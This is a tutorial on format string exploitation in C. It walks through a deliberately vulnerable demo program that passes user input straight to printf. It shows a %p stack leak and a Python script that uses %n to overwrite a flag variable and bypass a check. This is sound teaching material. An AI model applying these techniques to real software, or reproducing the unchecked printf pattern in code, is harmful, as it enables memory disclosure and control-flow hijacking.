Format String Exploitation

A format string defines the way in which data will be represented when printed. For instance, the following C code will output the current year:

printf ("This year is: %d\n", 2019); 

If data supplied to the printf function is derived from user input, this may lead to a format string vulnerability.

Taking advantage of the vulnerability allows attackers to read arbitary memory locations, which assist with further memory corruption attacks by undermining the effectiveness of ASLR.

In addition, an attacker may be able to write to arbitary memory locations and achieve code execution.

The below code listing shows an application which is vulnerable to format string exploitation.

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int security_flag;

void victory()
{
  printf("Security check passed!\n");
}

void failure()
{
  printf("Security check failed!\n");
}

void get_password()
{
  security_flag = 0;

  char buffer[512];  
  fgets(buffer, sizeof(buffer), stdin);  
  printf(buffer);  

  if (security_flag > 1)
  { 
     victory();
  }
  else
  {
     failure();
  }

  exit(1);   
}

int main(int argc, char **argv)
{
  get_password();
}

Reading Memory Locations

The “%p” format string parameter interprets data entered as a pointer. If the number of format string parameters exceeds the amount of data entered additional values from the stack will be presented.

./format_string_demo 
 AAAA-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p
AAAA-0x1f4-0xb7fcc5a0-0xb7ff212a-0x8-0xb7ff2116-0xb7fff000-0x41414141-0x2d70252d-0x252d7025-0x70252d70-0x2d70252d
 Security check failed!

The above example shows stack memory being displayed after using the “%p” format string. We can clearly see the “AAAA” characters entered being echoed back to the user in hexadecimal format (0x41414141).

Writing to Memory

While the above behavior is interesting, to subvert the application logic and reach the victory function we will need to modify the “security_flag” variable to be a value greater than zero. This can be achieved using the “%n” format string parameter. This parameter takes the number of characters written, and stores the output into a pointer, which is supplied as an argument.

First, we need to find the memory address of the security_flag variable in memory. We can do this using GDB:

(gdb) break main
Breakpoint 1 at 0x804859b
(gdb) run
Starting program: /home/user/format_string_demo 
Breakpoint 1, 0x0804859b in main ()
(gdb) p &security_flag
$1 = (<data variable, no debug info> *) 0x804a048 <security_flag>

So, we know we need to write a value greater than 1 to the address 0x804a048.

#!/usr/bin/python
import struct

buf = ''
buf += struct.pack('I', 0x804a048)
buf += '%p'*3
buf += '%n'
print(buf)

The above exploit first packs the address we wish to write to, then uses the %p parameter to read some data. The %n parameter then counts the output produced from %p and stores it in the memory address referenced.

We can run the script, and output the contents to a file:

python exploit.py > out

Then run the target executable in GDB. Set a breakpoint on the exit function of the get_password method:

(gdb) disassemble get_password
Dump of assembler code for function get_password:
   0x080484ed <+0>:	push   %ebp
   0x080484ee <+1>:	mov    %esp,%ebp
   0x080484f0 <+3>:	sub    $0x208,%esp
   0x080484f6 <+9>:	movl   $0x0,0x804a048
   0x08048500 <+19>:	mov    0x804a040,%eax
   0x08048505 <+24>:	sub    $0x4,%esp
   0x08048508 <+27>:	push   %eax
   0x08048509 <+28>:	push   $0x200
   0x0804850e <+33>:	lea    -0x208(%ebp),%eax
   0x08048514 <+39>:	push   %eax
   0x08048515 <+40>:	call   0x8048370 <fgets@plt>
   0x0804851a <+45>:	add    $0x10,%esp
   0x0804851d <+48>:	sub    $0xc,%esp
   0x08048520 <+51>:	lea    -0x208(%ebp),%eax
   0x08048526 <+57>:	push   %eax
   0x08048527 <+58>:	call   0x8048360 <printf@plt>
   0x0804852c <+63>:	add    $0x10,%esp
   0x0804852f <+66>:	mov    0x804a048,%eax
   0x08048534 <+71>:	cmp    $0x1,%eax
   0x08048537 <+74>:	jle    0x8048540 <get_password+83>
   0x08048539 <+76>:	call   0x80484bb <victory>
   0x0804853e <+81>:	jmp    0x8048545 <get_password+88>
   0x08048540 <+83>:	call   0x80484d4 <failure>
   0x08048545 <+88>:	sub    $0xc,%esp
   0x08048548 <+91>:	push   $0x1
   0x0804854a <+93>:	call   0x8048390 <exit@plt>
End of assembler dump.
(gdb) break * 0x0804854a
Breakpoint 1 at 0x804854a

Next, run the application and evaluate the contents of the security_flag variable:

(gdb) run < out
Starting program: /home/user/format_string_demo < out
H51230867961923086950698
Security check passed!

Breakpoint 1, 0x0804854a in get_password ()
(gdb) p/s security_flag
$2 = 27

We can see the security check has been passed since the number 27 has been written to the security_flag address.